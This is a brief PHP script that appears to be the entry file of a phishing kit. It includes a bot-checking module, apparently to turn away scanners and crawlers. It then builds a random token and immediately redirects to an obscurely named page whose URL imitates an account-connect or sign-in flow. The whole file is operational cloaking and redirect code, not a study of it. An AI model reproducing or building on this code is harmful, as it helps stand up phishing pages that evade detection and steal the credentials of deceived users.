<?php

session_start();

#------------------------
include("bots/checkbots.php");
bot::checkbot();
require_once 'i.php';
#------------------------

$x=md5(microtime());
echo "<META HTTP-EQUIV='refresh' content='0; URL=93473790397490.php?ID-connect?q=df&ehome&j-oin-us.x=$x$x'>";exit;
?>